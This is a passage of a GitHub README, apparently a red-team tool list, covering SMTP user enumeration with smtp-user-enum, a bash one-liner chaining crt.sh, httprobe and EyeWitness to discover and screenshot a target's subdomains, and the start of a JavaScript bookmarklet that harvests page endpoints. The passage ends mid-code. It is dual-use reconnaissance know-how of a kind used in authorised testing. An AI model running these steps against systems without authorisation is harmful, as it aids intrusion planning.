href=\"https://private-user-images.githubusercontent.com/100603074/423172554-d06bff41-8c0f-4d3d-b42e-1221b9866332.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTU0LWQwNmJmZjQxLThjMGYtNGQzZC1iNDJlLTEyMjFiOTg2NjMzMi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNGRkMDIzMzRmOTM3NTU4OGU2YzgwZjkzNjE5MjQ2MTk4Y2M5ZDYzNmQ2YTlhODY4MTQ4MWFlNzA5MDI4MTA2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2ORN7U6R7fK15z9ExKrw15ZRJDDWqjDDjoCYDvLGpFA\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172554-d06bff41-8c0f-4d3d-b42e-1221b9866332.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTU0LWQwNmJmZjQxLThjMGYtNGQzZC1iNDJlLTEyMjFiOTg2NjMzMi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNGRkMDIzMzRmOTM3NTU4OGU2YzgwZjkzNjE5MjQ2MTk4Y2M5ZDYzNmQ2YTlhODY4MTQ4MWFlNzA5MDI4MTA2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2ORN7U6R7fK15z9ExKrw15ZRJDDWqjDDjoCYDvLGpFA\" alt=\"subzy\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/\" rel=\"nofollow\"\u003ehttps://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv 
class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/cytopia/smtp-user-enum\"\u003esmtp-user-enum\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-smtp-user-enum\" class=\"anchor\" aria-label=\"Permalink: 🔙smtp-user-enum\" href=\"#smtp-user-enum\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip install smtp-user-enum\"\u003e\u003cpre\u003epip install smtp-user-enum\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"smtp-user-enum [options] -u/-U host port\nsmtp-user-enum --help\nsmtp-user-enum --version\"\u003e\u003cpre\u003esmtp-user-enum [options] 
-u/-U host port\nsmtp-user-enum --help\nsmtp-user-enum --version\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172510-2a965690-52f3-412a-90e3-54dd69e0b275.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTEwLTJhOTY1NjkwLTUyZjMtNDEyYS05MGUzLTU0ZGQ2OWUwYjI3NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZmVlZGFmMGViM2U0OWY5ZmE5MDExODk2MDIyZTFjODlmNzQzYWE2YmZkMzczM2RhZmU0M2QxMzExZmRhMmMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oM0zTt0NY9cj41OuU1Pj6Ofd5kQXIrnPvMbIsFpe4h4\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172510-2a965690-52f3-412a-90e3-54dd69e0b275.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTEwLTJhOTY1NjkwLTUyZjMtNDEyYS05MGUzLTU0ZGQ2OWUwYjI3NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZmVlZGFmMGViM2U0OWY5ZmE5MDExODk2MDIyZTFjODlmNzQzYWE2YmZkMzczM2RhZmU0M2QxMzExZmRhMmMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oM0zTt0NY9cj41OuU1Pj6Ofd5kQXIrnPvMbIsFpe4h4\" alt=\"smtp-user-enum\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.kali.org/tools/smtp-user-enum/\" 
rel=\"nofollow\"\u003ehttps://www.kali.org/tools/smtp-user-enum/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003ecrt.sh -\u0026gt; httprobe -\u0026gt; EyeWitness\u003c/h3\u003e\u003ca id=\"user-content-crtsh---httprobe---eyewitness\" class=\"anchor\" aria-label=\"Permalink: 🔙crt.sh -\u0026gt; httprobe -\u0026gt; EyeWitness\" href=\"#crtsh---httprobe---eyewitness\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eI have put together a bash one-liner that:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003ePassively collects a list of subdomains from certificate associations (\u003ca href=\"https://crt.sh/\" rel=\"nofollow\"\u003ecrt.sh\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eActively requests each subdomain to verify its existence (\u003ca href=\"https://github.com/tomnomnom/httprobe\"\u003ehttprobe\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eActively screenshots each subdomain for manual review (\u003ca href=\"https://github.com/FortyNorthSecurity/EyeWitness\"\u003eEyeWitness\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL \u0026quot;https://crt.sh/?q=${domain}\u0026quot; | pup 'td text{}' | grep \u0026quot;${domain}\u0026quot; | sort -n | uniq | httprobe \u0026gt; /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web\"\u003e\u003cpre\u003edomain=DOMAIN_COM\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003erand=\u003cspan class=\"pl-smi\"\u003e$RANDOM\u003c/span\u003e\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003ecurl -fsSL \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://crt.sh/?q=\u003cspan class=\"pl-smi\"\u003e${domain}\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e pup \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003etd text{}\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e grep \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e${domain}\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e sort -n \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e uniq \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e httprobe \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e /tmp/enum_tmp_\u003cspan class=\"pl-smi\"\u003e${rand}\u003c/span\u003e.txt\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_\u003cspan class=\"pl-smi\"\u003e${rand}\u003c/span\u003e.txt --web\u003c/pre\u003e\u003c/div\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cem\u003eNote: You must have \u003ca href=\"https://github.com/tomnomnom/httprobe\"\u003ehttprobe\u003c/a\u003e, \u003ca href=\"https://github.com/EricChiang/pup\"\u003epup\u003c/a\u003e and \u003ca href=\"https://github.com/FortyNorthSecurity/EyeWitness\"\u003eEyeWitness\u003c/a\u003e installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://twitter.com/renniepak/status/1602620834463588352\" rel=\"nofollow\"\u003ejsendpoints\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-jsendpoints\" class=\"anchor\" aria-label=\"Permalink: 🔙jsendpoints\" href=\"#jsendpoints\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 
0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA JavaScript bookmarklet for extracting all webpage endpoint links on a page.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCreated by \u003ca href=\"https://twitter.com/renniepak\" rel=\"nofollow\"\u003e@renniepak\u003c/a\u003e, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-js notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"javascript:(function(){var scripts=document.getElementsByTagName(\u0026quot;script\u0026quot;),regex=/(?\u0026lt;=(\\\u0026quot;|\\'|\\`))\\/[a-zA-Z0-9_?\u0026amp;=\\/\\-\\#\\.]*(?=(\\\u0026quot;|\\'|\\`))/g;const results=new Set;for(var i=0;i\u0026lt;scripts.length;i++){var t=scripts[i].src;\u0026quot;\u0026quot;!=t\u0026amp;\u0026amp;fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log(\u0026quot;An error occurred: \u0026quot;,t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+\u0026quot;\u0026lt;br\u0026gt;\u0026quot;)})}setTimeout(writeResults,3e3);})();\"\u003e\u003cpre\u003ejavascript:\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan 
class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003escripts\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003edocument\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003egetElementsByTagName\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"script\"\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eregex\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(?\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e|\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\'\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e|\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\`\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\/\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e[\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ea\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ez\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eA\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eZ\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan 
class=\"pl-c1\"\u003e9\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e_\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e?\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e\u0026amp;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\/\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\-\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\#\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\.\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e]\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e*\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(?\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e|\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\'\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e|\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\`\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003eg\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003econst\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003eresults\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-k\"\u003enew\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eSet\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efor\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e\u0026lt;\u003c/span\u003e\u003cspan 
class=\"pl-s1\"\u003escripts\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003elength\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e++\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003escripts\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e[\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e]\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003esrc\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"\"\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e!=\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e\u003cspan class=\"pl-en\"\u003efetch\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ethen\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003etext\u003c/span\u003e\u003cspan 
class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ethen\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ee\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ematchAll\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eregex\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efor\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003elet\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003er\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eof\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ee\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eresults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003eadd\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003er\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e[\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e]\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan 
class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ecatch\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003econsole\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003elog\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"An error occurred: \"\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epageContent\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003edocument\u003c/span\u003e\u003cspan 